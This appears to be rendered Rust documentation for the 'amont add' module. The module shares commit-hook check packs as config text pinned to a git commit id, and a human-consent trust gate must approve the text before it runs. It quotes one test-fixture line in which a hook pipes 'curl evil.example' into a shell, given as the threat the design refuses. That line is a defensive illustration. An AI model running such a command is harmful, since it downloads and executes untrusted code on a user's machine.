Expand description
Shipping a check — amont add.
A check could always be WRITTEN in amont.conf; it could never be SHARED.
The only routes were pasting a line into somebody’s manifest by hand, or
upstreaming it into amont itself.
pre-commit solved this by cloning a repository and executing it, building an
isolated environment per hook. That is its slowest part and it is precisely
what crate::trust exists to refuse — that module’s own test fixture
spells out the threat in one line:
pre-commit a * block curl evil.example | shSo what ships here is text, not execution. A pack is amont.conf syntax
and nothing else; amont add vendors those rows into your manifest; and
because the trust fingerprint is content-keyed over the whole file, the
append invalidates consent and a human must read every command before any of
them can run. The existing gate does the security work. This module only
saves the copy-paste.
§Why git, and why that answers “verify against what?”
amont links no crates (scripts/check-no-deps.sh), so it has no TLS and no
HTTP client, and must not grow one to fetch a config file. The only network
primitive it already uses is git — which turns out to be the right answer
rather than a consolation:
- git is content-addressed.
resolveturns a moving@v2into a commit id before anything is fetched, andfetchthen refuses whatever it received unless it hashes to that id. - the id, never the tag, is what gets written into
amont.conf. - SSH, HTTPS, private repositories and self-hosted forges all work already, with the user’s own credentials and none of amont’s.
§Nothing here is on the commit path
amont add is a setup verb. No hook calls into this module, nothing is
fetched between git commit and a verdict, and a_pack_costs_the_commit_ path_nothing asserts it.
Structs§
- Source
- Where a pack came from, and which revision of it.
Constants§
- PACK_
FILE - The file a pack repository must carry, at its root.
Functions§
- block
- fetch
- The pack’s text at
id, or an error. - parse_
source github:owner/repo@v2,forgejo:host/owner/repo, a git URL, or a local path.- resolve
- The commit id
revnames on the remote, before anything is downloaded. - rows
- The rows a pack may contribute, verbatim, or a refusal naming the first thing wrong with it.
- splice
manifestwith this source’s block replaced, or appended if it has none.